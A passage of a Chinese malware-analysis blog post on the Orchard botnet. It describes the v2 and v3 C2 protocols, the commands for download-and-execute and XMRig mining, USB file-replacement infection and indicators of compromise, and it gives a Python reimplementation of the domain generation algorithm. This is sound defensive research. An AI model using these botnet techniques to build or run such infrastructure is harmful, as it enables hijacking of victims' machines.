&#x72B6;&#x6001;&#x3001;&#x53D1;&#x5305;&#x7C7B;&#x578B;&#x53CA;&#x81EA;&#x8EAB;&#x7248;&#x672C;&#x3002;&#x4E0B;&#x9762;&#x662F;&#x4E00;&#x4E2A;&#x5B9E;&#x9645;&#x89C2;&#x5BDF;&#x5230;&#x7684;&#x7248;&#x672C;&#x53F7;&#x4FE1;&#x606F;&#xFF0C;Bot_Version=1.2/G&#x53EF;&#x80FD;&#x7684;&#x89E3;&#x91CA;&#x4E3A;&#xFF1A;&#x7248;&#x672C;=v1.2&#xFF0C;&#x7F16;&#x5199;&#x8BED;&#x8A00;=Golang&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/v2.golang-----1.png" alt="v2.golang-----1" loading="lazy"></p>
<p>v2&#x7248;&#x672C;&#x7684;C++&#x8BED;&#x8A00;&#x6837;&#x672C;&#x96C6;&#x6210;&#x4E86;&#x540C;&#x6837;&#x7684;C2&#xFF0C;&#x4E0A;&#x7EBF;&#x5305;&#x4E2D;&#x7684;&#x7248;&#x672C;&#x4FE1;&#x606F;&#x5219;&#x53D8;&#x6210;&#x4E86;&#x201C;Bot_version:1/C&#x201D;&#xFF0C;&#x5B83;&#x6240;&#x6536;&#x96C6;&#x7684;&#x4FE1;&#x606F;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/v2.C-------1.png" alt="v2.C-------1" loading="lazy"></p>
<p>&#x6839;&#x636E;&#x4EE3;&#x7801;&#x76F8;&#x4F3C;&#x6027;&#x5206;&#x6790;&#xFF0C;v2&#x7248;&#x672C;&#x7684;C++&#x6837;&#x672C;&#x8DDF;&#x540E;&#x6765;&#x7684;v3&#x7248;&#x672C;&#x4EE3;&#x7801;&#x540C;&#x6E90;&#xFF0C;&#x8BF4;&#x660E;&#x540E;&#x8005;&#x662F;&#x4ECE;&#x524D;&#x8005;&#x8FDB;&#x5316;&#x800C;&#x6765;&#x3002;</p>
<p>v2&#x7248;&#x672C;&#x4E00;&#x5171;&#x6709;&#x4E24;&#x79CD;&#x6307;&#x4EE4;&#xFF1A;</p>
<ul>
<li>&#x6307;&#x4EE4;1&#xFF1A;&#x7EC8;&#x7ED3;&#x5F53;&#x524D;&#x8FDB;&#x7A0B;&#x5220;&#x9664;&#x539F;&#x59CB;&#x6587;&#x4EF6;&#xFF0C;&#x6216;&#x8005;&#x91CD;&#x65B0;&#x542F;&#x52A8;&#x3002;</li>
<li>&#x6307;&#x4EE4;2&#xFF1A;&#x5224;&#x65AD;&#x54CD;&#x5E94;&#x6570;&#x636E;&#x4E3A;URL&#x6216;&#x8005;PE&#xFF0C;&#x5982;&#x679C;&#x662F;URL&#x5219;&#x4E0B;&#x8F7D;&#x6267;&#x884C;&#xFF0C;&#x5982;&#x679C;&#x662F;PE&#xFF0C;&#x5219;&#x521B;&#x5EFA;&#x8FDB;&#x7A0B;&#x6267;&#x884C;&#xFF08;CreateProcess&#x521B;&#x5EFA;&#x8FDB;&#x7A0B;&#x3001;&#x5080;&#x5121;&#x8FDB;&#x7A0B;&#x3001;&#x8FDC;&#x7A0B;&#x7EBF;&#x7A0B;&#x6CE8;&#x5165;&#x7B49;&#xFF09;&#x3002;</li>
</ul>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h4 id="dga">DGA&#x7B97;&#x6CD5;</h4>
<p>v2&#x7248;&#x672C;&#x7684;DGA&#x7B97;&#x6CD5;&#x8DDF;v1&#x76F8;&#x540C;&#xFF0C;&#x5DEE;&#x522B;&#x5728;&#x4E8E;&#x5BF9;&#x65E5;&#x671F;&#x5B57;&#x7B26;&#x4E32;&#x7684;&#x5904;&#x7406;&#xFF0C;v2&#x4F1A;&#x5728;&#x65E5;&#x671F;&#x5B57;&#x7B26;&#x4E32;&#x540E;&#x62FC;&#x63A5;&#x786C;&#x7F16;&#x7801;&#x7684;&#x57DF;&#x540D;&#x201C;orchardmaster.duckdns.org&#x201D;&#xFF0C;&#x5F62;&#x5982;&#x201C;2022/07/05orchardmaster.duckdns.org&quot;&#xFF0C;&#x7136;&#x540E;&#x5957;&#x7528;v1&#x7248;&#x672C;&#x7684;DGA&#x7B97;&#x6CD5;&#x751F;&#x6210;&#x57DF;&#x540D;&#x3002;</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h3 id="v3">v3&#x7248;&#x672C;</h3>
<p>v3&#x7684;&#x5F00;&#x53D1;&#x8BED;&#x8A00;&#x56DE;&#x5230;C++&#x7F16;&#x5199;&#xFF0C;&#x540C;&#x6837;&#x5305;&#x62EC;C2&#x901A;&#x4FE1;&#x548C;USB&#x611F;&#x67D3;&#x529F;&#x80FD;&#x3002;C2&#x901A;&#x4FE1;&#x903B;&#x8F91;&#x5728;&#x4E00;&#x4E2A;&#x7EBF;&#x7A0B;&#x4E2D;&#x8FD0;&#x884C;&#xFF0C;&#x540C;&#x65F6;&#x8BE5;&#x7EBF;&#x7A0B;&#x8FD8;&#x5305;&#x62EC;&#x4E00;&#x4E2A;&#x8DDF;XMRig&#x6316;&#x77FF;&#x7ED1;&#x5B9A;&#x7684;&#x8F85;&#x52A9;&#x7EBF;&#x7A0B;&#xFF0C;&#x5F53;Orchard&#x63A5;&#x6536;&#x5B8C;&#x6BD5;&#x4E0B;&#x53D1;&#x7684;XMrig&#x7A0B;&#x5E8F;&#x5E76;&#x521B;&#x5EFA;&#x5080;&#x5121;&#x8FDB;&#x7A0B;&#x8FD0;&#x884C;&#x4E4B;&#x540E;&#xFF0C;&#x8F85;&#x52A9;&#x7EBF;&#x7A0B;&#x4F1A;&#x5411;C2&#x518D;&#x6B21;&#x53D1;&#x9001;&#x6316;&#x77FF;&#x76F8;&#x5173;&#x7684;&#x786C;&#x4EF6;&#x4FE1;&#x606F;&#xFF0C;&#x5C1D;&#x8BD5;&#x4ECE;C2&#x8BFB;&#x53D6;&#x6316;&#x77FF;&#x8F6F;&#x4EF6;&#x7684;&#x914D;&#x7F6E;&#xFF0C;&#x76EE;&#x7684;&#x662F;&#x4E3A;&#x4E86;&#x68C0;&#x67E5;&#x662F;&#x5426;&#x9700;&#x8981;&#x52A8;&#x6001;&#x4FEE;&#x6539;XMRig&#x8FD0;&#x884C;&#x65F6;&#x7684;&#x914D;&#x7F6E;&#xFF08;XMRig&#x63D0;&#x4F9B;&#x4E86;&#x4E00;&#x5957;HTTP api&#xFF0C;&#x652F;&#x6301;&#x52A8;&#x6001;&#x8BFB;&#x53D6;&#x5E76;&#x4FEE;&#x6539;&#x8FD0;&#x884C;&#x65F6;&#x7684;&#x6316;&#x77FF;&#x914D;&#x7F6E;&#xFF09;&#x3002;</p>
<p>&#x4EE5;MD5=cb442cbff066dfef2e3ff0c56610148f&#x7684;&#x6837;&#x672C;&#x4E3A;&#x4F8B;&#xFF0C;C2&#x901A;&#x4FE1;&#x529F;&#x80FD;&#x5982;&#x4E0B;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/07/v3-1.png" alt="v3-1" loading="lazy"></p>
<p>v3&#x7248;&#x672C;&#x5728;C2&#x901A;&#x4FE1;&#x4E2D;&#x540C;&#x6837;&#x4F7F;&#x7528;json&#x683C;&#x5F0F;&#x6765;&#x4FDD;&#x5B58;&#x4E3B;&#x673A;&#x4FE1;&#x606F;&#xFF0C;&#x53D1;&#x9001;&#x6570;&#x636E;&#x7684;&#x6574;&#x4F53;&#x7ED3;&#x6784;&#x4E3A;<strong>Byte_0x46+TotalLen+InfoLen+Info.json</strong>&#x3002;&#x76F8;&#x6BD4;v2&#xFF0C;v3&#x589E;&#x52A0;&#x4E86;&#x591A;&#x4E2A;&#x8DDF;&#x6316;&#x77FF;&#x76F8;&#x5173;&#x7684;&#x5B57;&#x6BB5;&#xFF0C;&#x6536;&#x96C6;&#x7684;&#x4FE1;&#x606F;&#x5305;&#x62EC;&#xFF1A;</p>
<ul>
<li>Active_Window&#xFF1A;&#x5F53;&#x524D;&#x6D3B;&#x52A8;&#x7A97;&#x53E3;&#x540D;&#x79F0;</li>
<li>Antivirus&#xFF1A;&#x6740;&#x8F6F;&#x4FE1;&#x606F;</li>
<li>Authentiate_Type&#xFF1A;Windows&#x8EAB;&#x4EFD;&#x9A8C;&#x8BC1;&#x7C7B;&#x578B;</li>
<li>CPU_Model&#xFF1A;CPU&#x4FE1;&#x606F;</li>
<li>Camera&#xFF1A;&#x662F;&#x5426;&#x5B58;&#x5728;&#x6444;&#x50CF;&#x5934;</li>
<li>Elevated&#xFF1A;&#x662F;&#x5426;&#x662F;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;</li>
<li>GPU_Models&#xFF1A;&#x663E;&#x5361;&#x4FE1;&#x606F;</li>
<li>Identity&#xFF1A;HWID\&#x7528;&#x6237;&#x540D;\&#x7535;&#x8111;&#x540D;&#x79F0;</li>
<li>Operating_System&#xFF1A;&#x7CFB;&#x7EDF;&#x7248;&#x672C;&#x4FE1;&#x606F;</li>
<li>Ram_Size&#xFF1A;&#x8FD0;&#x884C;&#x5185;&#x5B58;&#x5927;&#x5C0F;</li>
<li>System_Architecture&#xFF1A;&#x5904;&#x7406;&#x5668;&#x4E2A;&#x6570;</li>
<li>Threads&#xFF1A;&#x6BCF;&#x4E2A;&#x5904;&#x7406;&#x5668;&#x5185;&#x6838;&#x4E2A;&#x6570;</li>
<li>Version&#xFF1A;Orchard&#x7248;&#x672C;</li>
</ul>
<p>v3&#x7684;&#x4E0A;&#x7EBF;&#x5305;&#x5B9E;&#x4F8B;&#x5982;&#x4E0B;&#x6240;&#x793A;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/v3.c-------1-1.png" alt="v3.c-------1-1" loading="lazy"></p>
<p>C2&#x54CD;&#x5E94;&#x6D88;&#x606F;&#x7684;body&#x90E8;&#x5206;&#x4E5F;&#x4E3A;json&#x683C;&#x5F0F;&#xFF0C;&#x5176;&#x7ED3;&#x6784;&#x4E3A;&#xFF1A;TotalLen.dword+ Byte0x46+TotalLen+RespDataLen+RespData.json&#x3002;v3&#x652F;&#x6301;8&#x4E2A;&#x6307;&#x4EE4;&#xFF0C;&#x5BF9;&#x5E94;3&#x79CD;&#x64CD;&#x4F5C;&#xFF1A;</p>
<ul>
<li>&#x6307;&#x4EE4;1&#xFF1A;&#x6536;&#x96C6;&#x4E3B;&#x673A;&#x4FE1;&#x606F;/&#x81EA;&#x8EAB;&#x8FD0;&#x884C;&#x72B6;&#x6001;&#x5E76;&#x53D1;&#x9001;&#x5230;C2&#xFF08;&#x5B57;&#x6BB5;&#x5305;&#x62EC;Domain&#x3001;In_Memory&#x3001;Install_Path&#x3001;Is_Patched&#x3001;Message_Type&#x3001;Patch_Name&#x3001;Port&#x3001;Power_SaverMode&#x3001;Process_ID&#x3001;Process_Name&#x3001;Process_Path&#x3001;System_Idle&#x3001;System_Uptime&#xFF09;</li>
<li>&#x6307;&#x4EE4;4&#x3001;6&#xFF1A;&#x7EC8;&#x7ED3;&#x5F53;&#x524D;&#x8FDB;&#x7A0B;&#x5220;&#x9664;&#x539F;&#x59CB;&#x6587;&#x4EF6;&#xFF0C;&#x6216;&#x8005;&#x91CD;&#x65B0;&#x542F;&#x52A8;&#x3002;</li>
<li>&#x6307;&#x4EE4;7&#x3001;8&#xFF1A;&#x4E0B;&#x8F7D;&amp;&#x6267;&#x884C;&#x4E0B;&#x53D1;&#x7684;&#x77FF;&#x673A;&#x7A0B;&#x5E8F;</li>
</ul>
<p>&#x4E0B;&#x9762;&#x662F;&#x4E00;&#x4E2A;&#x5B9E;&#x9645;&#x8DDF;&#x8E2A;&#x5230;&#x7684;C2&#x54CD;&#x5E94;&#x6307;&#x4EE4;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/v33-3.png" alt="v33-3" loading="lazy"></p>
<p>&#x5176;&#x4E2D;Transfer_Port&#x8868;&#x793A;&#x5E0C;&#x671B;&#x4E3B;&#x673A;&#x518D;&#x6B21;&#x5411;2929&#x8FDB;&#x884C;&#x8BF7;&#x6C42;&#xFF0C;Message_Type&#x8868;&#x793A;&#x6307;&#x4EE4;&#x7801;&#xFF0C;&#x5176;&#x503C;&#x4E3A;7&#xFF0C;&#x8868;&#x793A;&#x4E0B;&#x8F7D;&amp;&#x6267;&#x884C;&#x3002;</p>
<p>&#x6536;&#x5230;&#x4E0A;&#x8FF0;&#x6307;&#x4EE4;&#x540E;&#xFF0C;bot&#x518D;&#x6B21;&#x5411;C2&#x7684;TCP 2929&#x7AEF;&#x53E3;&#x53D1;&#x8D77;&#x8BF7;&#x6C42;&#xFF0C;Cuda&#x662F;Nvidia&#x63A8;&#x51FA;&#x7684;&#x53EA;&#x80FD;&#x7528;&#x4E8E;&#x81EA;&#x5BB6;GPU&#x7684;&#x5E76;&#x884C;&#x8BA1;&#x7B97;&#x6846;&#x67B6;&#xFF0C;&#x8FD9;&#x91CC;&#x7684;Cuda_Version&#x4E3A;0&#x8868;&#x793A;&#x4E0D;&#x652F;&#x6301;Cuda&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/v31-5.png" alt="v31-5" loading="lazy"></p>
<p>&#x968F;&#x540E;C2&#x54CD;&#x5E94;&#x4E00;&#x4E2A;XMRig&#x77FF;&#x673A;&#x7A0B;&#x5E8F;&#xFF0C;Client&#x63A5;&#x6536;&#x4FDD;&#x5B58;&#x540E;&#x6839;&#x636E;&#x6307;&#x4EE4;7&#x5C06;XMRig&#x6CE8;&#x5165;&#x5080;&#x5121;&#x8FDB;&#x7A0B;&#x5F00;&#x59CB;&#x6267;&#x884C;&#x6316;&#x77FF;&#x5DE5;&#x4F5C;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/v34-1-1.png" alt="v34-1-1" loading="lazy"></p>
<p>&#x5206;&#x6790;&#x8FC7;&#x7A0B;&#x4E2D;&#x6211;&#x4EEC;&#x53D1;&#x73B0;v3&#x7248;&#x672C;&#x6700;&#x8FD1;&#x5728;&#x6301;&#x7EED;&#x5206;&#x53D1;&#x4E00;&#x4E2A;&#x540C;&#x6837;&#x7684;XMRig&#x6316;&#x77FF;&#x7A0B;&#x5E8F;&#xFF0C;&#x540E;&#x8005;&#x96C6;&#x6210;&#x4E86;&#x9ED8;&#x8BA4;&#x7684;&#x6316;&#x77FF;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#xFF0C;&#x79C1;&#x6709;&#x77FF;&#x6C60;&#x5730;&#x5740;&#xFF1A;45.61.187.7:7733</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h4 id="dga">DGA&#x7B97;&#x6CD5;</h4>
<p>v3&#x7684;DGA&#x7B97;&#x6CD5;&#x672A;&#x53D8;&#xFF0C;&#x4F46;&#x8F93;&#x5165;&#x7684;&#x53D8;&#x5316;&#x8F83;&#x5927;&#x3002;&#x5B9E;&#x9645;&#x4E0A;&#x5B83;&#x4F1A;&#x751F;&#x6210;&#x4E24;&#x7EC4;DGA&#x57DF;&#x540D;&#xFF0C;&#x7B2C;&#x4E00;&#x7EC4;&#x57DF;&#x540D;&#x7684;&#x8F93;&#x5165;&#x62FC;&#x63A5;&#x7B97;&#x6CD5;&#x662F;&#x65E5;&#x671F;&#x5B57;&#x7B26;&#x4E32;+&#x201C;ojena.duckdns.org&#x201D;&#xFF0C; &#x5F62;&#x5982; &#x201C;2022-08-02ojena.duckdns.org&#x201D;&#x3002;&#x7B2C;&#x4E8C;&#x7EC4;&#x57DF;&#x540D;&#x7684;&#x8F93;&#x5165;&#x4E3A;<code>https://blockchain.info/balance?active=1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa</code> &#x8FD9;&#x4E2A;URL&#x7684;&#x8FD4;&#x56DE;&#x7ED3;&#x679C;&#xFF0C;&#x4E00;&#x4E2A;&#x5178;&#x578B;&#x7684;&#x8FD4;&#x56DE;&#x7ED3;&#x679C;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<pre><code>{&quot;1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa&quot;:&quot;final_balance&quot;:6854884253,&quot;n_tx&quot;:3393,&quot;total_received&quot;:6854884253}}
</code></pre>
<p>&#x76F8;&#x5173;&#x5B57;&#x6BB5;&#x7684;&#x542B;&#x4E49;&#x53EF;&#x4EE5;&#x53C2;&#x8003;<a href="https://zh.m.wikipedia.org/zh-hans/Blockchain.com?ref=blog.netlab.360.com">Blockchain</a>&#x7684;<a href="http://cw.hubwiz.com/card/c/blockchain-api/1/3/9/?ref=blog.netlab.360.com">API&#x624B;&#x518C;</a>&#xFF1A;</p>
<pre><code>n_tx&#xFF1A;&#x4EA4;&#x6613;&#x6570;&#x91CF;
total_received&#xFF1A;&#x63A5;&#x6536;&#x6BD4;&#x7279;&#x5E01;&#x603B;&#x91CF;
final_balance&#xFF1A;&#x6700;&#x7EC8;&#x4F59;&#x989D;
</code></pre>
<p>&#x503C;&#x5F97;&#x5F3A;&#x8C03;&#x7684;&#x662F;v3&#x7248;&#x672C;&#x5E76;&#x672A;&#x5BF9;&#x8FD4;&#x56DE;&#x7684;&#x7ED3;&#x679C;&#x8FDB;&#x884C;&#x89E3;&#x6790;&#xFF0C;&#x800C;&#x662F;&#x4F5C;&#x4E3A;&#x6574;&#x4F53;&#x76F4;&#x63A5;&#x8F93;&#x5165;DGA&#x7B97;&#x6CD5;&#x6765;&#x751F;&#x6210;&#x57DF;&#x540D;&#x3002;&#x800C;&#x94B1;&#x5305;&#x5730;&#x5740;<code>1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa</code> &#x636E;&#x8BF4;&#x662F;&#x4E2D;&#x672C;&#x806A;&#x672C;&#x4EBA;&#x6240;&#x6301;&#x6709;&#x7684;<a href="https://en.bitcoin.it/wiki/Genesis_block?ref=blog.netlab.360.com">&#x6BD4;&#x7279;&#x5E01;&#x521B;&#x4E16;&#x5730;&#x5740;</a>&#x3002;&#x8FC7;&#x53BB;&#x7684;&#x5341;&#x51E0;&#x5E74;&#x95F4;&#xFF0C;&#x7531;&#x4E8E;&#x5404;&#x79CD;&#x539F;&#x56E0;&#xFF0C;&#x6BCF;&#x5929;&#x90FD;&#x4F1A;&#x6709;&#x4EBA;&#x5411;&#x8BE5;&#x94B1;&#x5305;&#x8F6C;&#x5165;&#x5C0F;&#x91CF;&#x6BD4;&#x7279;&#x5E01;&#xFF0C;&#x56E0;&#x6B64;&#x5B83;&#x662F;&#x53D8;&#x5316;&#x7684;&#xFF0C;&#x5E76;&#x4E14;&#x8BE5;&#x53D8;&#x5316;&#x5F88;&#x96BE;&#x9884;&#x6D4B;&#xFF0C;&#x56E0;&#x6B64;&#x8BE5;&#x94B1;&#x5305;&#x7684;&#x4F59;&#x989D;&#x4FE1;&#x606F;&#x4E5F;&#x53EF;&#x4EE5;&#x4F5C;&#x4E3A;DGA&#x8F93;&#x5165;&#x3002;</p>
<p>&#x5728;&#x6211;&#x4EEC;&#x7F16;&#x5199;&#x6587;&#x7AE0;&#x65F6;&#xFF0C;&#x53D1;&#x73B0;&#x8FD1;&#x671F;&#x5DF2;&#x6709;<a href="https://bin.re/blog/the-dgas-of-sharkbot/?ref=blog.netlab.360.com">&#x5176;&#x4ED6;&#x7814;&#x7A76;&#x4EBA;&#x5458;&#x6CE8;&#x610F;&#x5230;v3&#x7248;&#x672C;&#x8FD9;&#x79CD;&#x5C06;&#x6BD4;&#x7279;&#x5E01;&#x8D26;&#x53F7;&#x4EA4;&#x6613;&#x4FE1;&#x606F;&#x7528;&#x4F5C;DGA&#x8F93;&#x5165;&#x7684;&#x73B0;&#x8C61;</a>&#xFF0C;&#x6240;&#x5206;&#x6790;&#x7ED3;&#x679C;&#x4E0E;&#x6211;&#x4EEC;&#x4E00;&#x81F4;&#xFF0C;&#x4F46;&#x5BF9;&#x65B9;&#x5E76;&#x6CA1;&#x6709;&#x6CE8;&#x610F;&#x5230;Orchard&#x5176;&#x5B9E;&#x65E9;&#x5DF2;&#x51FA;&#x73B0;&#x3002;</p>
<p>&#x5B8C;&#x6574;&#x7684;v3&#x7248;&#x672C;DGA&#x7B97;&#x6CD5;&#x5982;&#x4E0B;&#xFF1A;</p>
<pre><code># 2022/07/05
import datetime
import requests
import hashlib

# cluster 1
days = 30
for i in range(0, days):
    domains = [&apos;ojena.duckdns.org&apos;, &apos;vgzero.duckdns.org&apos;]
    for do in domains:
        datex = (datetime.datetime.now() - datetime.timedelta(days=i)).strftime(&apos;%Y-%m-%d&apos; + do)
        print(&quot;seed_1: %s&quot; % datex)
        md5 = hashlib.md5(datex.encode()).hexdigest()
        print(&quot;md5: %s&quot; % md5)
        
        dga_list = []
        dga_list.append(md5[:8])
        dga_list.append(md5[8:16])
        dga_list.append(md5[16:24])
        dga_list.append(md5[24:32])
        for j in range(len(dga_list)):
            print(dga_list[j] + &apos;.com&apos;)
            print(dga_list[j] + &apos;.net&apos;)
            print(dga_list[j] + &apos;.org&apos;)
            print(dga_list[j] + &apos;.duckdns.org&apos;)


# cluster 2
url = &apos;https://blockchain.info/balance?active=1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa&apos; 
res = requests.get(url)
wallet_info = res.text
print(&apos;seed_2: %s&apos; % wallet_info)
md5 = hashlib.md5(wallet_info.encode()).hexdigest()
print(&apos;md5: %s&apos; % md5)

dga_list = []
dga_list.append(md5[:8])
dga_list.append(md5[8:16])
dga_list.append(md5[16:24])
dga_list.append(md5[24:32])
for j in range(len(dga_list)):
    print(dga_list[j] + &apos;.com&apos;)
    print(dga_list[j] + &apos;.net&apos;)
    print(dga_list[j] + &apos;.org&apos;)
    print(dga_list[j] + &apos;.duckdns.org&apos;)

</code></pre>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h3 id="usb">USB&#x611F;&#x67D3;&#x903B;&#x8F91;</h3>
<p>Orchard&#x7684;&#x6587;&#x4EF6;&#x611F;&#x67D3;&#x5E76;&#x975E;&#x4F20;&#x7EDF;&#x7684;&#x4EE3;&#x7801;&#x63D2;&#x5165;&#xFF0C;&#x800C;&#x662F;&#x4E00;&#x79CD;&#x6587;&#x4EF6;&#x66FF;&#x6362;&#x3002;&#x5F53;&#x68C0;&#x6D4B;&#x5230;USB&#x5B58;&#x50A8;&#x8BBE;&#x5907;&#x65F6;&#xFF0C;Orchard&#x4F1A;&#x5728;&#x8BBE;&#x5907;&#x6839;&#x76EE;&#x5F55;&#x4E0B;&#x521B;&#x5EFA;&#x9690;&#x85CF;&#x76EE;&#x5F55;&#xFF0C;&#x904D;&#x5386;&#x6240;&#x6709;&#x6587;&#x4EF6;&#x8FDB;&#x884C;&#x611F;&#x67D3;&#xFF0C;&#x5E76;&#x5C06;&#x611F;&#x67D3;&#x524D;&#x548C;&#x611F;&#x67D3;&#x540E;&#x7684;&#x6587;&#x4EF6;&#x90FD;&#x5907;&#x4EFD;&#x5230;&#x8BE5;&#x9690;&#x85CF;&#x76EE;&#x5F55;&#x4E0B;&#xFF0C;&#x88AB;&#x611F;&#x67D3;&#x5BF9;&#x8C61;&#x5728;&#x611F;&#x67D3;&#x65F6;&#x53BB;&#x6389;&#x4E86;&#x7C7B;&#x578B;&#x5C5E;&#x6027;&#xFF0C;&#x611F;&#x67D3;&#x540E;&#x5168;&#x90E8;&#x53D8;&#x4E3A;exe&#x7C7B;&#x578B;&#xFF0C;&#x5E76;&#x8FFD;&#x52A0;&#x4E86;.exe&#x540E;&#x7F00;&#xFF0C;&#x53D8;&#x6210;&#x4E86;&#x53EF;&#x6267;&#x884C;&#x6587;&#x4EF6;&#x3002;&#x968F;&#x540E;&#x6837;&#x672C;&#x4F1A;&#x590D;&#x5236;&#x81EA;&#x8EAB;&#x5230;&#x88AB;&#x611F;&#x67D3;&#x76EE;&#x5F55;&#x4E0B;&#x5E76;&#x968F;&#x673A;&#x547D;&#x540D;&#xFF0C;&#x8BE5;&#x5B57;&#x7B26;&#x4E32;&#x4FDD;&#x5B58;&#x5230;&#x4E86;&#x88AB;&#x611F;&#x67D3;&#x6587;&#x4EF6;&#x7684;&#x8D44;&#x6E90;&#x91CC;&#x3002;&#x5F53;&#x8BBE;&#x5907;&#x4E2D;&#x7684;&#x88AB;&#x611F;&#x67D3;&#x6587;&#x4EF6;&#x5728;&#x65B0;&#x7CFB;&#x7EDF;&#x4E2D;&#x88AB;&#x7528;&#x6237;&#x6267;&#x884C;&#x540E;&#xFF0C;&#x5219;&#x4F1A;&#x542F;&#x52A8;&#x9690;&#x85CF;&#x76EE;&#x5F55;&#x4E2D;&#x7684;&#x6837;&#x672C;&#x6587;&#x4EF6;&#xFF0C;&#x8FBE;&#x5230;&#x611F;&#x67D3;&#x4F20;&#x64AD;&#x7684;&#x76EE;&#x7684;&#x3002;</p>
<p>USB&#x611F;&#x67D3;&#x8FC7;&#x7A0B;&#x4F1A;&#x6D89;&#x53CA;&#x4E24;&#x4E2A;&#x5185;&#x5D4C;&#x7684;PE&#x6587;&#x4EF6;&#xFF0C;&#x7B2C;&#x4E00;&#x4E2A;&#x6587;&#x4EF6;&#x662F;DLL&#x6587;&#x4EF6;&#xFF0C;&#x4F1A;&#x88AB;&#x91CA;&#x653E;&#x5230;%LocalAppData%&#x76EE;&#x5F55;&#x4E0B;&#xFF0C;&#x8BE5;DLL&#x88AB;Orchard&#x79F0;&#x4F5C;CGO_Helper&#xFF0C;&#x4E3B;&#x8981;&#x7528;&#x4E8E;&#x63D0;&#x53D6;&#x548C;&#x66FF;&#x6362;&#x88AB;&#x611F;&#x67D3;&#x6587;&#x4EF6;&#x7684;&#x56FE;&#x6807;&#xFF0C;&#x5176;MD5&#x662F;10D42F5465D5D8808B43619D8266BD99&#x3002;&#x7B2C;&#x4E8C;&#x4E2A;&#x6587;&#x4EF6;&#x662F;exe&#x6587;&#x4EF6;&#xFF0C;MD5&#x4E3A;f3c06399c68c5fdf80bb2853f8f2934b&#xFF0C;&#x4F5C;&#x4E3A;&#x5B58;&#x50A8;&#x611F;&#x67D3;&#x4EE3;&#x7801;&#x7684;&#x6A21;&#x677F;&#x6587;&#x4EF6;&#xFF0C;&#x88AB;&#x611F;&#x67D3;&#x6587;&#x4EF6;&#x7684;&#x5168;&#x90E8;&#x6570;&#x636E;&#x5C06;&#x88AB;&#x66FF;&#x6362;&#x4E3A;&#x8BE5;&#x6A21;&#x677F;&#x6587;&#x4EF6;&#x7684;&#x6570;&#x636E;&#x3002;&#x8BE5;&#x6A21;&#x677F;&#x7684;&#x529F;&#x80FD;&#x662F;&#x6839;&#x636E;&#x8D44;&#x6E90;&#x4E2D;&#x7684;exe&#x540D;&#x79F0;&#x5BFB;&#x627E;&#x9690;&#x85CF;&#x76EE;&#x5F55;&#x4E0B;&#x5BF9;&#x5E94;&#x7684;exe&#x542F;&#x52A8;&#x6267;&#x884C;&#xFF0C;&#x6240;&#x4EE5;&#x88AB;&#x611F;&#x67D3;&#x6587;&#x4EF6;&#x7684;&#x8D44;&#x6E90;&#x4E2D;&#x4FDD;&#x5B58;&#x7684;&#x662F;&#x5907;&#x4EFD;&#x7684;Orchard&#x6837;&#x672C;&#x540D;&#x79F0;&#x3002;</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>USB&#x611F;&#x67D3;&#x60C5;&#x51B5;&#x793A;&#x4F8B;&#x5982;&#x4E0B;&#xFF0C;&#x88AB;&#x611F;&#x67D3;&#x6587;&#x4EF6;&#x8D44;&#x6E90;&#x4E2D;&#x4FDD;&#x5B58;&#x4E86;Orchard&#x6837;&#x672C;&#x7684;&#x540D;&#x79F0;&#xFF0C;&#x5F53;&#x7528;&#x6237;&#x70B9;&#x51FB;&#x53D7;&#x611F;&#x67D3;&#x7684;exe&#xFF0C;&#x5C06;&#x542F;&#x52A8;&#x9690;&#x85CF;&#x76EE;&#x5F55;&#x4E0B;&#x7684;Orchard&#x6837;&#x672C;&#x6587;&#x4EF6;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/07/-----4.png" alt="-----4" loading="lazy"></p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h2 id>&#x603B;&#x7ED3;</h2>
<p>Orchard&#x662F;&#x4E00;&#x4E2A;&#x4F7F;&#x7528;&#x4E86;DGA&#x6280;&#x672F;&#x7684;botnet&#x5BB6;&#x65CF;&#xFF0C;&#x6700;&#x65B0;&#x7248;&#x672C;&#x81F4;&#x529B;&#x4E8E;&#x6316;&#x77FF;&#xFF0C;&#x5E76;&#x5F00;&#x59CB;&#x4F7F;&#x7528;&#x4E2D;&#x672C;&#x806A;&#x7684;&#x6BD4;&#x7279;&#x5E01;&#x8D26;&#x53F7;&#x4EA4;&#x6613;&#x4FE1;&#x606F;&#x8FD9;&#x7C7B;&#x66F4;&#x96BE;&#x9884;&#x6D4B;&#x7684;&#x4FE1;&#x606F;&#x4F5C;&#x4E3A;DGA&#x7684;&#x8F93;&#x5165;&#xFF0C;&#x589E;&#x52A0;&#x4E86;&#x68C0;&#x6D4B;&#x96BE;&#x5EA6;&#x3002;&#x5728;1&#x5E74;&#x591A;&#x7684;&#x65F6;&#x95F4;&#x91CC;&#xFF0C;Orchard&#x5148;&#x540E;&#x51FA;&#x73B0;&#x4E86;&#x81F3;&#x5C11;3&#x4E2A;&#x4E0D;&#x540C;&#x7248;&#x672C;&#xFF0C;&#x7F16;&#x7A0B;&#x8BED;&#x8A00;&#x548C;DGA&#x5B9E;&#x73B0;&#x90FD;&#x6709;&#x53D8;&#x5316;&#xFF0C;&#x8FD9;&#x8BF4;&#x660E;Orchard&#x662F;&#x4E00;&#x4E2A;&#x4ECD;&#x5904;&#x4E8E;&#x6D3B;&#x8DC3;&#x671F;&#x